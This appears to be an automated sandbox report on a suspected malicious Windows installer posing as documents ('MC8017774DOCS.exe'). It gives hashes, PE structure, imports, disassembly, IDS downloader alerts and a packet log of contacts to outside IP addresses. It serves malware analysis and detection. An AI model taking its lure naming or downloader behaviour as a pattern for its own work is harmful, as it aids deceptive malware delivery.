                                                                                                                                                  Size (bytes):11776
                                                                                                                                                  Entropy (8bit):5.890541747176257
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:X24sihno0bW+l97H4GB7QDs91kMtwtobTr4u+QHbazMNHT7dmNIEr:m8vJl97JeoxtN/r3z7YV
                                                                                                                                                  MD5:75ED96254FBF894E42058062B4B4F0D1
                                                                                                                                                  SHA1:996503F1383B49021EB3427BC28D13B5BBD11977
                                                                                                                                                  SHA-256:A632D74332B3F08F834C732A103DAFEB09A540823A2217CA7F49159755E8F1D7
                                                                                                                                                  SHA-512:58174896DB81D481947B8745DAFE3A02C150F3938BB4543256E8CCE1145154E016D481DF9FE68DAC6D48407C62CBE20753320EBD5FE5E84806D07CE78E0EB0C4
                                                                                                                                                  Malicious:false
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                  • Filename: Pigroots.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: Shave.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: Readouts.bat.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: New listed items 7648767856387547354734567465647568487.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: yVVZdG2NJX.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: PaymentAdvice.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: S50MC-C_3170262-7.6cylinder_liner.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: ORDER 20240986 OA.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: PayeeAdvice_HK54912_R0038704_37504.exe, Detection: malicious, Browse
                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....oZ...........!..... ...........).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...x....@.......(..............@....reloc..~....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                  Static File Info

                                                                                                                                                  General

                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                  Entropy (8bit):7.748269107029679
                                                                                                                                                  TrID:
                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                  File name:MC8017774DOCS.exe
                                                                                                                                                  File size:567'152 bytes
                                                                                                                                                  MD5:d4c19e96d83bd586016a3be2e3a57f1d
                                                                                                                                                  SHA1:bf5d7271766db9b568ac98006c7eda0de40bc2bd
                                                                                                                                                  SHA256:5cba2773587387ad35e187bf5135467da368909ae0d4dd1a0f1d80be6338fc44
                                                                                                                                                  SHA512:03078c41d61c02c1f8f7d34c4b93ac4d534a26c4d3dd28c04102d7f10b2eecea6499b38e0a87db0447314b3ca1f097f02d1c7ebd5d3fa994d9708d86df9f9c62
                                                                                                                                                  SSDEEP:12288:32EIMY+ov3ZXExuA5lpKHHtmZxxNQicmd3ZhZF:3w9+U36t5lAnoZxbcmdPZF
                                                                                                                                                  TLSH:5FC4E050F25DE897F52725B14C7FD93015DAAB5C91A4820E329A7A1E68E335320AFF0F
                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L.....oZ.................d....:....

                                                                                                                                                  File Icon

                                                                                                                                                  Icon Hash:38206a6a62666429

                                                                                                                                                  Static PE Info

                                                                                                                                                  General

                                                                                                                                                  Entrypoint:0x40336c
                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                  Digitally signed:false
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                  Time Stamp:0x5A6FED1F [Tue Jan 30 03:57:19 2018 UTC]
                                                                                                                                                  TLS Callbacks:
                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                  OS Version Major:4
                                                                                                                                                  OS Version Minor:0
                                                                                                                                                  File Version Major:4
                                                                                                                                                  File Version Minor:0
                                                                                                                                                  Subsystem Version Major:4
                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                  Import Hash:b34f154ec913d2d2c435cbd644e91687

                                                                                                                                                  Entrypoint Preview

                                                                                                                                                  Instruction
                                                                                                                                                  sub esp, 000002D4h
                                                                                                                                                  push ebx
                                                                                                                                                  push esi
                                                                                                                                                  push edi
                                                                                                                                                  push 00000020h
                                                                                                                                                  pop edi
                                                                                                                                                  xor ebx, ebx
                                                                                                                                                  push 00008001h
                                                                                                                                                  mov dword ptr [esp+14h], ebx
                                                                                                                                                  mov dword ptr [esp+10h], 0040A2E0h
                                                                                                                                                  mov dword ptr [esp+1Ch], ebx
                                                                                                                                                  call dword ptr [004080A8h]
                                                                                                                                                  call dword ptr [004080A4h]
                                                                                                                                                  and eax, BFFFFFFFh
                                                                                                                                                  cmp ax, 00000006h
                                                                                                                                                  mov dword ptr [007A8A2Ch], eax
                                                                                                                                                  je 00007F56CD24B193h
                                                                                                                                                  push ebx
                                                                                                                                                  call 00007F56CD24E445h
                                                                                                                                                  cmp eax, ebx
                                                                                                                                                  je 00007F56CD24B189h
                                                                                                                                                  push 00000C00h
                                                                                                                                                  call eax
                                                                                                                                                  mov esi, 004082B0h
                                                                                                                                                  push esi
                                                                                                                                                  call 00007F56CD24E3BFh
                                                                                                                                                  push esi
                                                                                                                                                  call dword ptr [00408150h]
                                                                                                                                                  lea esi, dword ptr [esi+eax+01h]
                                                                                                                                                  cmp byte ptr [esi], 00000000h
                                                                                                                                                  jne 00007F56CD24B16Ch
                                                                                                                                                  push 0000000Ah
                                                                                                                                                  call 00007F56CD24E418h
                                                                                                                                                  push 00000008h
                                                                                                                                                  call 00007F56CD24E411h
                                                                                                                                                  push 00000006h
                                                                                                                                                  mov dword ptr [007A8A24h], eax
                                                                                                                                                  call 00007F56CD24E405h
                                                                                                                                                  cmp eax, ebx
                                                                                                                                                  je 00007F56CD24B191h
                                                                                                                                                  push 0000001Eh
                                                                                                                                                  call eax
                                                                                                                                                  test eax, eax
                                                                                                                                                  je 00007F56CD24B189h
                                                                                                                                                  or byte ptr [007A8A2Fh], 00000040h
                                                                                                                                                  push ebp
                                                                                                                                                  call dword ptr [00408044h]
                                                                                                                                                  push ebx
                                                                                                                                                  call dword ptr [004082A0h]
                                                                                                                                                  mov dword ptr [007A8AF8h], eax
                                                                                                                                                  push ebx
                                                                                                                                                  lea eax, dword ptr [esp+34h]
                                                                                                                                                  push 000002B4h
                                                                                                                                                  push eax
                                                                                                                                                  push ebx
                                                                                                                                                  push 0079FEE0h
                                                                                                                                                  call dword ptr [00408188h]
                                                                                                                                                  push 0040A2C8h

                                                                                                                                                  Rich Headers

                                                                                                                                                  Programming Language:
                                                                                                                                                  • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                                                  Data Directories

                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x3c70000x17000.rsrc
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                  Sections

                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                  .text0x10000x64000x6400eed0986138e3ef22dbb386f4760a55c0False0.6783203125data6.511089687733535IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                  .rdata0x80000x138e0x14002914bac53cd4485c9822093463e4eea6False0.4509765625data5.146454805063938IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                  .data0xa0000x39eb380x60009e0c528682cd2747c63b7ba39c2cc23unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                  .ndata0x3a90000x1e0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                  .rsrc0x3c70000x170000x17000c8f8279129ad38fd03ee7b50a97e5aeaFalse0.21903659986413043data5.096977274603887IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                  Resources

                                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                  RT_BITMAP0x3c73880x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                                                                                                                                  RT_ICON0x3c76f00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.16976221459836743
                                                                                                                                                  RT_ICON0x3d7f180x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.32863070539419087
                                                                                                                                                  RT_ICON0x3da4c00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.42424953095684803
                                                                                                                                                  RT_ICON0x3db5680xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.30730277185501065
                                                                                                                                                  RT_ICON0x3dc4100x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.32445848375451264
                                                                                                                                                  RT_ICON0x3dccb80x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.2579479768786127
                                                                                                                                                  RT_ICON0x3dd2200x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6374113475177305
                                                                                                                                                  RT_DIALOG0x3dd6880x144dataEnglishUnited States0.5216049382716049
                                                                                                                                                  RT_DIALOG0x3dd7d00x13cdataEnglishUnited States0.5506329113924051
                                                                                                                                                  RT_DIALOG0x3dd9100x100dataEnglishUnited States0.5234375
                                                                                                                                                  RT_DIALOG0x3dda100x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                                  RT_DIALOG0x3ddb300xc4dataEnglishUnited States0.5918367346938775
                                                                                                                                                  RT_DIALOG0x3ddbf80x60dataEnglishUnited States0.7291666666666666
                                                                                                                                                  RT_GROUP_ICON0x3ddc580x68dataEnglishUnited States0.7211538461538461
                                                                                                                                                  RT_MANIFEST0x3ddcc00x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795

                                                                                                                                                  Imports

                                                                                                                                                  DLLImport
                                                                                                                                                  KERNEL32.dllSetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                                                                                                  USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                                                                                                                                  GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                                                                  SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                                                                                                                                  ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                                                                                  COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                                                                  ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                                                                                                                  Possible Origin

                                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                                  EnglishUnited States

                                                                                                                                                  Network Behavior

                                                                                                                                                  Suricata IDS Alerts

                                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                  2024-11-25T07:09:51.498327+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.649801185.244.144.6880TCP
                                                                                                                                                  2024-11-25T07:09:55.095980+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649808132.226.8.16980TCP
                                                                                                                                                  2024-11-25T07:09:57.783587+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649808132.226.8.16980TCP
                                                                                                                                                  2024-11-25T07:09:59.525079+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649821172.67.177.134443TCP
                                                                                                                                                  2024-11-25T07:10:04.799293+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649826132.226.8.16980TCP
                                                                                                                                                  2024-11-25T07:10:06.599757+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649838172.67.177.134443TCP
                                                                                                                                                  2024-11-25T07:10:18.087506+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649871172.67.177.134443TCP
                                                                                                                                                  2024-11-25T07:10:21.452984+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649882172.67.177.134443TCP
                                                                                                                                                  2024-11-25T07:10:24.723371+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649890172.67.177.134443TCP
                                                                                                                                                  2024-11-25T07:10:28.422026+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649902172.67.177.134443TCP

                                                                                                                                                  Network Port Distribution

                                                                                                                                                  TCP Packets

                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Nov 25, 2024 07:09:49.928318977 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:50.047949076 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:50.048043966 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:50.048825026 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:50.168212891 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.498241901 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.498260021 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.498272896 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.498327017 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.498351097 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.500376940 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.500431061 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.603843927 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.603879929 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.603948116 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.617614031 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.617628098 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.617666960 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.617713928 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.619843960 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.619901896 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.723620892 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.723695993 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.724009037 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.724023104 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.724049091 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.724060059 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.724066019 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.724087000 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.724097967 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.724102020 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.724111080 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.724122047 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.724133015 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.724147081 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.724174976 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.724200964 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.724212885 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.724236965 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.724251986 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.727696896 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.727745056 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.727790117 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.727834940 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.737160921 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.737375021 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.737416029 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.744472027 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.744575024 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.744577885 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.744714975 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.771832943 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.771899939 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.844278097 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.844372034 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.845937967 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.846038103 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.846046925 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.846157074 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.854285002 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.854338884 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.854373932 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.854424953 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.862658978 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.862756968 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.862777948 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.862843990 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.871057987 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.871119022 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.871154070 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.871202946 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.879477978 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.879542112 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.879600048 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.879648924 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.887795925 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.887861967 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.887892008 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.887955904 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.896189928 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.896251917 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.896292925 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.896337032 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.904560089 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.904609919 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.904675007 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.904721022 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.913075924 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.913089991 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.913142920 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.921335936 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.921392918 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.921442986 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.921490908 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.929718971 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.929780960 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.929811001 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.929867983 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.938102007 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.938158035 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.938219070 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.938262939 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.946465969 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.946518898 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.964025974 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.964076996 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.966109037 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.966156960 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.966272116 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.966317892 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.974522114 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.974598885 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.974627018 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.974673986 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.982873917 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.982933998 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.982986927 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.983036041 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.991663933 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.991777897 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.991796017 CET8049801185.244.144.68192.168.2.6
